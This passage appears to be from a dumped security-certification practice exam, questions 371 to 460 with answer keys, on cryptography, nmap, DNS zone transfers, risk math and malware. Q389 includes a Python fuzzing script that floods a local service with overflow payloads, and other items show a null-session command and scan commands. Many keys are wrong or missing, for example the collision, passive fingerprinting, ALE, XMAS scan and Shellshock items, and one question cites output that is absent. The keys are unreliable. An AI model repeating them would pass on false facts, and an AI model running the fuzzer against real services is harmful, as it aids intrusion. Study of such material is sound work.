Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 371
What is the difference between the AES and RSA algorithms?

A. Both are asymmetric algorithms, but RSA uses 1024-bit keys.
B. RSA is asymmetric, which is used to create a public/private key pair; AES is symmetric, which is used to
encrypt data.
C. Both are symmetric algorithms, but AES uses 256-bit keys.
D. AES is asymmetric, which is used to create a public/private key pair; RSA is symmetric, which is used to
encrypt data.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 372
Which of the following programming languages is most susceptible to buffer overflow attacks, due to its lack of
a built-in bounds checking mechanism?

Code:
#include <string.h>
int main(){
    char buffer[8];
    /* no bounds check: the string is longer than the 8-byte buffer */
    strcpy(buffer, "11111111111111111111111111111");
}

Output: Segmentation fault

A. C#
B. Python
C. Java
D. C++

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 373
The security administrator of ABC needs to permit Internet traffic to the host 10.0.0.2 and UDP traffic to the host
10.0.0.3. He also needs to permit all FTP traffic to the rest of the network and deny all other traffic. After he
applied his ACL configuration on the router, nobody can access FTP and the permitted hosts cannot access
the Internet. According to the following configuration, what is happening in the network?

access-list 102 deny tcp any any
access-list 104 permit udp host 10.0.0.3 any
access-list 110 permit tcp host 10.0.0.2 eq www any
access-list 108 permit tcp any eq ftp any

A. The ACL 110 needs to be changed to port 80
B. The ACL for FTP must be before the ACL 110
C. The first ACL is denying all TCP traffic and the other ACLs are being ignored by the router
D. The ACL 104 needs to be first because it is UDP

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 374
Bob received this text message on his mobile phone: "Hello, this is Scott Smelby from the Yahoo Bank. Kindly
contact me for a vital transaction on: scottsmelby@yahoo.com". Which statement below is true?

A. This is probably a legitimate message as it comes from a respectable organization.
B. Bob should write to scottsmelby@yahoo.com to verify the identity of Scott.
C. This is a scam as everybody can get a @yahoo address, not the Yahoo customer service employees.
D. This is a scam because Bob does not know Scott.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 375
In an internal security audit, the white hat hacker gains control over a user account and attempts to acquire
access to another account's confidential files and information. How can he achieve this?

A. Port Scanning
B. Hacking Active Directory
C. Privilege Escalation
D. Shoulder-Surfing

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 376
Which of the following will perform an Xmas scan using NMAP?

A. nmap -sA 192.168.1.254
B. nmap -sP 192.168.1.254
C. nmap -sX 192.168.1.254
D. nmap -sV 192.168.1.254

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 377
As an Ethical Hacker you are capturing traffic from your customer network with Wireshark and you need to find
and verify just SMTP traffic. What command in Wireshark will help you to find this kind of traffic?

A. request smtp 25
B. tcp.port eq 25
C. smtp port
D. tcp.contains port 25

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 378
Which service in a PKI will vouch for the identity of an individual or company?

A. KDC
B. CA
C. CR
D. CBC

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 379
In IPv6 what is the major difference concerning application layer vulnerabilities compared to IPv4?

A. Implementing IPv4 security in a dual-stack network offers protection from IPv6 attacks too.
B. Vulnerabilities in the application layer are independent of the network layer. Attacks and mitigation
techniques are almost identical.
C. Due to the extensive security measures built into IPv6, application layer vulnerabilities need not be addressed.
D. Vulnerabilities in the application layer are greatly different from IPv4.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 380
In which phase of the ethical hacking process can Google hacking be employed? This is a technique that
involves manipulating a search string with specific operators to search for vulnerabilities.

Example:
allintitle: root passwd

A. Maintaining Access
B. Gaining Access
C. Reconnaissance
D. Scanning and Enumeration

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 381
Which type of security feature stops vehicles from crashing through the doors of a building?

A. Turnstile
B. Bollards
C. Mantrap
D. Receptionist

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 382
........is an attack type for a rogue Wi-Fi access point that appears to be a legitimate one offered on the
premises, but actually has been set up to eavesdrop on wireless communications. It is the wireless version of
the phishing scam. An attacker fools wireless users into connecting a laptop or mobile phone to a tainted
hotspot by posing as a legitimate provider. This type of attack may be used to steal the passwords of
unsuspecting users by either snooping the communication link or by phishing, which involves setting up a
fraudulent web site and luring people there.

Fill in the blank with appropriate choice.

A. Collision Attack
B. Evil Twin Attack
C. Sinkhole Attack
D. Signal Jamming Attack

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 383
Which access control mechanism allows for multiple systems to use a central authentication server (CAS) that
permits users to authenticate once and gain access to multiple systems?

A. Role Based Access Control (RBAC)
B. Discretionary Access Control (DAC)
C. Windows authentication
D. Single sign-on

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 384
What attack is used to crack passwords by using a precomputed table of hashed passwords?

A. Brute Force Attack
B. Hybrid Attack
C. Rainbow Table Attack
D. Dictionary Attack

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 385
Your next door neighbor, that you do not get along with, is having issues with their network, so he yells to his
spouse the network's SSID and password and you hear them both clearly. What do you do with this
information?

A. Nothing, but suggest to him to change the network's SSID and password.
B. Sell his SSID and password to friends that come to your house, so it doesn't slow down your network.
C. Log onto his network, after all it's his fault that you can get in.
D. Only use his network when you have large downloads so you don't tax your own network.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 386
Shellshock had the potential for an unauthorized user to gain access to a server. It affected many Internet-
facing services. Which OS did it not directly affect?

A. Windows
B. Unix
C. Linux
D. OS X

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 387
You want to analyze packets on your wireless network. Which program would you use?

A. Wireshark with Airpcap
B. Airsnort with Airpcap
C. Wireshark with Winpcap
D. Ethereal with Winpcap

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 388
It has been reported to you that someone has caused an information spillage on their computer. You go to the
computer, disconnect it from the network, remove the keyboard and mouse, and power it down. What step in
incident handling did you just complete?

A. Containment
B. Eradication
C. Recovery
D. Discovery

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 389
#!/usr/bin/python
import socket

# list of payloads of increasing length: 50, 100, ... bytes of "A"
buffer=["A"]
counter=50
while len(buffer)<=100:
    buffer.append("A"*counter)
    counter=counter+50

commands=["HELP","STATS.","RTIME.","LTIME.","SRUN.","TRUN.","GMON.","GDOG.","KSTET.","GTER.","HTER.","LTER.","KSTAN."]

# send every command followed by each payload to the service on port 9999
for command in commands:
    for buffstring in buffer:
        print "Exploiting "+command+":"+str(len(buffstring))
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('127.0.0.1',9999))
        s.recv(50)
        s.send(command+buffstring)
        s.close()

What is the code written for?

A. Buffer Overflow
B. Encryption
C. Bruteforce
D. Denial-of-service (DoS)

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 390
An enterprise recently moved to a new office and the new neighborhood is a little risky. The CEO wants to
monitor the physical perimeter and the entrance doors 24 hours. What is the best option to do this job?

A. Use fences in the entrance doors.
B. Install a CCTV with cameras pointing to the entrance doors and the street.
C. Use an IDS in the entrance doors and install some of them near the corners.
D. Use lights in all the entrance doors and along the company's perimeter.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 391
Which of the following is a serious vulnerability in the popular OpenSSL cryptographic software library. This
weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used
to secure the Internet.

A. Heartbleed Bug
B. POODLE
C. SSL/TLS Renegotiation Vulnerability
D. Shellshock

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 392
There are several ways to gain insight into how a cryptosystem works with the goal of reverse engineering the
process. Which term describes when two pieces of data result in the same value?

A. Collision
B. Collusion
C. Polymorphism
D. Escrow

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 393
Which of the following security policies defines the use of VPN for gaining access to an internal corporate
network?

A. Network security policy
B. Remote access policy
C. Information protection policy
D. Access control policy

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 394
One of the Forbes 500 companies has been subjected to a large scale attack. You are one of the shortlisted
pen testers that they may hire. During the interview with the CIO, he emphasized that he wants to totally
eliminate all risks. What is one of the first things you should do when hired?

A. Interview all employees in the company to rule out possible insider threats.
B. Establish attribution to suspected attackers.
C. Explain to the CIO that you cannot eliminate all risk, but you will be able to reduce risk to acceptable levels.
D. Start the Wireshark application to start sniffing network traffic.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 395
Which of the following is an NMAP script that could help detect HTTP Methods such as GET, POST, HEAD,
PUT, DELETE, TRACE?

A. http-git
B. http-headers
C. http enum
D. http-methods

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 396
Which of the following is the most important phase of ethical hacking wherein you need to spend considerable
amount of time?

A. Gaining access
B. Escalating privileges
C. Network mapping
D. Footprinting

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 397
It is a short-range wireless communication technology that allows mobile phones, computers and other devices
to connect and communicate. This technology intends to replace cables connecting portable devices with high
regards to security.

A. Bluetooth
B. Radio-FrequencyIdentification
C. WLAN
D. InfraRed

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 398
Matthew received an email with an attachment named "YouWon$10Grand.zip." The zip file contains a file named
"HowToClaimYourPrize.docx.exe." Out of excitement and curiosity, Matthew opened the said file. Without his
knowledge, the file copies itself to Matthew's APPDATA\local directory and begins to beacon to a
Command-and-control server to download additional malicious binaries. What type of malware has Matthew
encountered?

A. Key-logger
B. Trojan
C. Worm
D. Macro Virus

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 399
Which among the following is a Windows command that a hacker can use to list all the shares to which the
current user context has access?

A. NET FILE
B. NET USE
C. NET CONFIG
D. NET VIEW

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 400
What is the approximate cost of replacement and recovery operation per year of a hard drive that has a value
of $300 given that the technician who charges $10/hr would need 10 hours to restore OS and Software and
needs further 4 hours to restore the database from the last backup to the new hard disk? Calculate the SLE,
ARO, and ALE. Assume the EF = 1 (100%).

A. $440
B. $100
C. $1320
D. $146

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 401
Knowing the nature of backup tapes, which of the following is the MOST RECOMMENDED way of storing
backup tapes?

A. In a cool dry environment
B. Inside the data center for faster retrieval in a fireproof safe
C. In a climate controlled facility offsite
D. On a different floor in the same building

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 402
Which of the following tools would MOST LIKELY be used to perform a security audit on various forms of
network systems?

A. Intrusion Detection System
B. Vulnerability scanner
C. Port scanner
D. Protocol analyzer

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 403
Security and privacy of/on information systems are two entities that require lawful regulations. Which of the
following regulations defines security and privacy controls for Federal information systems and organizations?

A. NIST SP 800-53
B. PCI-DSS
C. EU Safe Harbor
D. HIPAA

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 404
A big company, who wanted to test their security infrastructure, wants to hire elite pen testers like you. During
the interview, they asked you to show sample reports from previous penetration tests. What should you do?

A. Share reports, after NDA is signed
B. Share full reports, not redacted
C. Decline but, provide references
D. Share full reports with redactions

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 405
You are about to be hired by a well known Bank to perform penetration tests. Which of the following documents
describes the specifics of the testing, the associated violations, and essentially protects both the bank's
interest and your liabilities as a tester?

A. Service Level Agreement
B. Non-Disclosure Agreement
C. Terms of Engagement
D. Project Scope

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 406
The practical realities facing organizations today make risk response strategies essential. Which of the
following is NOT one of the five basic responses to risk?

A. Accept
B. Mitigate
C. Delegate
D. Avoid

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 407
A company recently hired your team of Ethical Hackers to test the security of their network systems. The
company wants to have the attack be as realistic as possible. They did not provide any information besides the
name of their company. What phase of security testing would your team jump in right away?

A. Scanning
B. Reconnaissance
C. Escalation
D. Enumeration

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 408
TCP/IP stack fingerprinting is the passive collection of configuration attributes from a remote device during
standard layer 4 network communications. Which of the following tools can be used for passive OS
fingerprinting?

A. nmap
B. ping
C. tracert
D. tcpdump

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 409
The chance of a hard drive failure is known to be once every four years. The cost of a new hard drive is $500.
EF (Exposure Factor) is about 0.5. Calculate for the Annualized Loss Expectancy (ALE).

A. $62.5
B. $250
C. $125
D. $65.2

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 410
Backing up data is a security must. However, it also carries a certain level of risk when mishandled. Which of the
following is the greatest threat posed by backups?

A. A backup is the source of Malware or illicit information
B. A backup is incomplete because no verification was performed
C. A backup is unavailable during disaster recovery
D. An unencrypted backup can be misplaced or stolen

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 411
What kind of risk will remain even if all theoretically possible safety measures would be applied?

A. Residual risk
B. Inherent risk
C. Impact risk
D. Deferred risk

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 412
While doing a Black box pen test via the TCP port (80), you noticed that the traffic gets blocked when you tried
to pass IRC traffic from a web enabled host. However, you also noticed that outbound HTTP traffic is being
allowed. What type of firewall is being utilized for the outbound traffic?

A. Stateful
B. Application
C. Circuit
D. Packet Filtering

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 413
It is a widely used standard for message logging. It permits separation of the software that generates
messages, the system that stores them, and the software that reports and analyzes them. This protocol is
specifically designed for transporting event messages. Which of the following is being described?

A. SNMP
B. ICMP
C. SYSLOG
D. SMS

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 414
While doing a technical assessment to determine network vulnerabilities, you used the TCP XMAS scan. What
would be the response of all open ports?

A. The port will send an ACK
B. The port will send a SYN
C. The port will ignore the packets
D. The port will send an RST

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 415
Which of the following tools is used by pen testers and analysts specifically to analyze links between data using
link analysis and graphs?

A. Metasploit
B. Wireshark
C. Maltego
D. Cain & Abel

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 416
If you are to determine the attack surface of an organization, which of the following is the BEST thing to do?

A. Running a network scan to detect network services in the corporate DMZ
B. Reviewing the need for a security clearance for each employee
C. Using configuration management to determine when and where to apply security patches
D. Training employees on the security policy regarding social engineering

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 417
What is the best Nmap command to use when you want to list all devices in the same network quickly after you
successfully identified a server whose IP address is 10.10.0.5?

A. nmap -T4 -F 10.10.0.0/24
B. nmap -T4 -q 10.10.0.0/24
C. nmap -T4 -O 10.10.0.0/24
D. nmap -T4 -r 10.10.1.0/24

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 418
You've just discovered a server that is currently active within the same network with the machine you recently
compromised. You ping it but it did not respond. What could be the case?

A. TCP/IP doesn't support ICMP
B. ARP is disabled on the target server
C. ICMP could be disabled on the target server
D. You need to run the ping command with root privileges

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 419
Which of the following BEST describes the mechanism of a Boot Sector Virus?

A. Moves the MBR to another location on the hard disk and copies itself to the original location of the
MBR
B. Moves the MBR to another location on the RAM and copies itself to the original location of the MBR
C. Overwrites the original MBR and only executes the new virus code
D. Modifies directory table entries so that directory entries point to the virus code instead of the actual
program

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 420
What is the term coined for logging, recording and resolving events in a company?

A. Internal Procedure
B. Security Policy
C. Incident Management Process
D. Metrics

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 421
XOR is a common cryptographic tool. 10110001 XOR 00111010 is?

A. 10111100
B. 11011000
C. 10011101
D. 10001011

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 422
A server has been infected by a certain type of Trojan. The hacker intended to utilize it to send and
host junk mails. What type of Trojan did the hacker use?

A. Turtle Trojans
B. Ransomware Trojans
C. Botnet Trojan
D. Banking Trojans

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 423
First thing you do every office day is to check your email inbox. One morning, you received an email
from your best friend and the subject line is quite strange. What should you do?

A. Delete the email and pretend nothing happened.
B. Forward the message to your supervisor and ask for her opinion on how to handle the situation.
C. Forward the message to your company's security response team and permanently delete the message
from your computer.
D. Reply to the sender and ask them for more information about the message contents.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 424
LM hash is a compromised password hashing function. Which of the following parameters describe
LM Hash?

I. The maximum password length is 14 characters.
II. There are no distinctions between uppercase and lowercase.
III. It's a simple algorithm, so 10,000,000 hashes can be generated per second.

A. I
B. I, II, and III
C. II
D. I and II

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 425
Defining rules, collaborating human workforce, creating a backup plan, and testing the plans are
within what phase of the Incident Handling Process?

A. Preparation phase
B. Containment phase
C. Recovery phase
D. Identification phase

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 426
Which of the following is a hardware requirement that either an IDS/IPS system or a proxy server
must have in order to properly function?

A. Fast processor to help with network traffic analysis
B. They must be dual-homed
C. Similar RAM requirements
D. Fast network interface cards

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 427
In order to show improvement of security over time, what must be developed?

A. Reports
B. Testing tools
C. Metrics
D. Taxonomy of vulnerabilities

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 428
Passive reconnaissance involves collecting information through which of the following?

A. Social engineering
B. Network traffic sniffing
C. Man in the middle attacks
D. Publicly accessible sources

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 429
How can rainbow tables be defeated?

A. Password salting
B. Use of non-dictionary words
C. All uppercase character passwords
D. Lockout accounts under brute force password cracking attempts

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 430
The following is a sample of output from a penetration tester's machine targeting a machine with the
IP address of 192.168.1.106:

What is most likely taking place?

A. Ping sweep of the 192.168.1.106 network
B. Remote service brute force attempt
C. Port scan of 192.168.1.106
D. Denial of service attack on 192.168.1.106

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 431
An NMAP scan of a server shows port 25 is open. What risk could this pose?

A. Open printer sharing
B. Web portal data leak
C. Clear text authentication
D. Active mail relay

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 432
A penetration tester is conducting a port scan on a specific host. The tester found several ports
opened that were confusing in concluding the Operating System (OS) version installed. Considering the
NMAP result below, which of the following is likely to be installed on the target machine by the OS?

Starting NMAP 5.21 at 2011-03-15 11:06
NMAP scan report for 172.16.40.65
Host is up (1.00s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
23/tcp   open  telnet
80/tcp   open  http
139/tcp  open  netbios-ssn
515/tcp  open
631/tcp  open  ipp
9100/tcp open
MAC Address: 00:00:48:0D:EE:89

A. The host is likely a Windows machine.
B. The host is likely a Linux machine.
C. The host is likely a router.
D. The host is likely a printer.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 433
What type of OS fingerprinting technique sends specially crafted packets to the remote OS and
analyzes the received response?

A. Passive
B. Reflective
C. Active
D. Distributive

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 434
Which of the following lists are valid data-gathering activities associated with a risk assessment?

A. Threat identification, vulnerability identification, control analysis
B. Threat identification, response identification, mitigation identification
C. Attack profile, defense profile, loss profile
D. System profile, vulnerability identification, security determination

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 435
Which system consists of a publicly available set of databases that contain domain name registration
contact information?

A. WHOIS
B. IANA
C. CAPTCHA
D. IETF

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 436
A penetration tester was hired to perform a penetration test for a bank. The tester began searching
for IP ranges owned by the bank, performing lookups on the bank's DNS servers, reading news
articles online about the bank, watching what times the bank employees come into work and leave
from work, searching the bank's job postings (paying special attention to IT related jobs), and visiting
the local dumpster for the bank's corporate office. What phase of the penetration test is the tester
currently in?

A. Information reporting
B. Vulnerability assessment
C. Active information gathering
D. Passive information gathering

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 437
The following is part of a log file taken from the machine on the network with the IP address of
192.168.1.106:

Time:Mar 13 17:30:15 Port:20 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP
Time:Mar 13 17:30:17 Port:21 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP
Time:Mar 13 17:30:19 Port:22 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP
Time:Mar 13 17:30:21 Port:23 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP
Time:Mar 13 17:30:22 Port:25 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP
Time:Mar 13 17:30:23 Port:80 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP
Time:Mar 13 17:30:30 Port:443 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP

What type of activity has been logged?

A. Port scan targeting 192.168.1.103
B. Teardrop attack targeting 192.168.1.106
C. Denial of service attack targeting 192.168.1.103
D. Port scan targeting 192.168.1.106

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 438
SNMP is a protocol used to query hosts, servers, and devices about performance or health status
data. This protocol has long been used by hackers to gather a great amount of information about
remote hosts.

Which of the following features makes this possible? (Choose two)

A. It uses TCP as the underlying protocol.
B. It uses a community string that is transmitted in clear text.
C. It is susceptible to sniffing.
D. It is used by all network devices on the market.

Correct Answer: BC
Section: (none)
Explanation

Explanation/Reference:

QUESTION 439
John is a keen administrator, and has followed all of the best practices as he could find on securing
his Windows Server. He has renamed the Administrator account to a new name that he is sure
cannot be easily guessed. However, there are people who already attempt to compromise his newly
renamed administrator account.

How is it possible for a remote attacker to decipher the name of the administrator account if it has
been renamed?

A. The attacker used the user2sid program.
B. The attacker used the sid2user program.
C. The attacker used nmap with the V switch.
D. The attacker guessed the new name.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 440
Jess the hacker runs L0phtCrack's built-in sniffer utility which grabs SMB password hashes and
stores them for offline cracking. Once cracked, these passwords can provide easy access to
whatever network resources the user account has access to.

But Jess is not picking up hashes from the network. Why?

A. The network protocol is configured to use SMB Signing.
B. The physical network wire is on fibre optic cable.
C. The network protocol is configured to use IPSEC.
D. L0phtCrack SMB filtering only works through Switches and not Hubs.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 441
Bob is acknowledged as a hacker of repute and is popular among visitors of "underground" sites.
Bob is willing to share his knowledge with those who are willing to learn, and many have expressed
their interest in learning from him. However, this knowledge has a risk associated with it, as it can be
used for malevolent attacks as well.

In this context, what would be the most effective method to bridge the knowledge gap between the
"black" hats or crackers and the "white" hats or computer security professionals? (Choose the best
answer)

A. Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards.
B. Hire more computer security monitoring personnel to monitor computer systems and networks.
C. Make obtaining either a computer security certification or accreditation easier to achieve so more
individuals feel that they are a part of something larger than life.
D. Train more National Guard and reservists in the art of computer security to help out in times of emergency
or crises.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 442
Peter extracts the SIDs list from a Windows 2000 Server machine using the hacking tool
"SIDExtractor". Here is the output of the SIDs:

s-1-5-21-1125394485-807628933-54978560-100 Johns
s-1-5-21-1125394485-807628933-54978560-652 Rebecca
s-1-5-21-1125394485-807628933-54978560-412 Sheela
s-1-5-21-1125394485-807628933-54978560-999 Shawn
s-1-5-21-1125394485-807628933-54978560-777 Somia
s-1-5-21-1125394485-807628933-54978560-500 chang
s-1-5-21-1125394485-807628933-54978560-555 Micah

From the above list identify the user account with System Administrator privileges.

A. John
B. Rebecca
C. Sheela
D. Shawn
E. Somia
F. Chang
G. Micah

Correct Answer: F
Section: (none)
Explanation

Explanation/Reference:

QUESTION 443
Which address translation scheme would allow a single public IP address to always correspond to a
single machine on an internal network, allowing "server publishing"?

A. Overloading Port Address Translation
B. Dynamic Port Address Translation
C. Dynamic Network Address Translation
D. Static Network Address Translation

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation: Mapping an unregistered IP address to a registered IP address on a one-to-one basis.
Particularly useful when a device needs to be accessible from outside the network.

QUESTION 444
What is the following command used for?

net use \\target\ipc$ "" /u:""

A. Grabbing the etc/passwd file
B. Grabbing the SAM
C. Connecting to a Linux computer through Samba.
D. This command is used to connect as a null session
E. Enumeration of Cisco routers

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 445
What is the proper response for a NULL scan if the port is closed?

A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response

Correct Answer: E
Section: (none)
Explanation

Explanation/Reference:

QUESTION 446
One of your team members has asked you to analyze the following SOA record. What is the TTL?

Rutgers.edu. SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400)

A. 200303028
B. 3600
C. 604800
D. 2400
E. 60
F. 4800

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 447
One of your team members has asked you to analyze the following SOA record. What is the version?

Rutgers.edu. SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400)

A. 200303028
B. 3600
C. 604800
D. 2400
E. 60
F. 4800

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 448
MX record priority increases as the number increases. (True/False)

A. True
B. False

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 449
Which of the following tools can be used to perform a zone transfer?

A. NSLookup
B. Finger
C. Dig
D. Sam Spade
E. Host
F. Netcat
G. Neotrace

Correct Answer: ACDE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 450
Under what conditions does a secondary name server request a zone transfer from a primary name
server?

A. When a primary SOA is higher than a secondary SOA
B. When a secondary SOA is higher than a primary SOA
C. When a primary name server has had its service restarted
D. When a secondary name server has had its service restarted
E. When the TTL falls to zero

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 451
What ports should be blocked on the firewall to prevent NetBIOS traffic from coming through the
firewall if your network is comprised of Windows NT, 2000, and XP? (Choose all that apply.)

A. 110
B. 135
C. 139
D. 161
E. 445
F. 1024

Correct Answer: BCE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 452
What is a NULL scan?

A. A scan in which all flags are turned off
B. A scan in which certain flags are off
C. A scan in which all flags are on
D. A scan in which the packet size is set to zero
E. A scan with an illegal packet size

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 453
What is the proper response for a NULL scan if the port is open?

A. SYN
B. ACK
C. FIN
D. PSH
E. RST
F. No response

Correct Answer: F
Section: (none)
Explanation

Explanation/Reference:

QUESTION 454
Which of the following statements about a zone transfer is correct? (Choose three.)

A. A zone transfer is accomplished with the DNS
B. A zone transfer is accomplished with the nslookup service
C. A zone transfer passes all zone information that a DNS server maintains
D. A zone transfer passes all zone information that a nslookup server maintains
E. A zone transfer can be prevented by blocking all inbound TCP port 53 connections
F. Zone transfers cannot occur on the Internet

Correct Answer: ACE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 455
You have the SOA presented below in your Zone. Your secondary servers have not been able to
contact your primary server to synchronize information. How long will the secondary servers attempt
to contact the primary server before it considers that the zone is dead and stops responding to queries?

collegae.edu. SOA cikkye.edu ipad.college.edu. (200302028 3600 3600 604800 3600)

A. One day
B. One hour
C. One week
D. One month

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 456
Sara is using the nslookup command to craft queries to list all DNS information (such as Name
Servers, host names, MX records, CNAME records, glue records (delegation for child Domains),
zone serial number, Time To Live (TTL) records, etc.) for a Domain. What do you think Sara is trying to
accomplish? Select the best answer.

A. A zone harvesting
B. A zone transfer
C. A zone update
D. A zone estimate

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 457
A zone file consists of which of the following Resource Records (RRs)?

A. DNS, NS, AXFR, and MX records
B. DNS, NS, PTR, and MX records
C. SOA, NS, AXFR, and MX records
D. SOA, NS, A, and MX records

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 458
Let's imagine three companies (A, B and C), all competing in a challenging global environment.
Company A and B are working together in developing a product that will generate a major
competitive advantage for them. Company A has a secure DNS server while company B has a DNS
server vulnerable to spoofing.
With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails
from company B. How do you prevent DNS spoofing? (Select the Best Answer.)

A. Install DNS logger and track vulnerable packets
B. Disable DNS timeouts
C. Install DNS Anti-spoofing
D. Disable DNS Zone Transfer

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 459
Which DNS resource record can indicate how long any "DNS poisoning" could last?

A. MX
B. SOA
C. NS
D. TIMEOUT

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 460
Joseph was the Web site administrator for the Mason Insurance in New York, whose main Web site
was located at www.masonins.com. Joseph uses his laptop computer regularly to administer the
Web site. One night, Joseph received an urgent phone call from his friend, Smith. According to
Smith, the main Mason Insurance web site had been vandalized! All of its normal content was
removed and replaced with an attacker's message ''Hacker Message: You are dead! Freaks!''

From his office, which was directly connected to Mason Insurance's internal network, Joseph surfed
to the Web site using his laptop. In his browser, the Web site looked completely intact. No changes
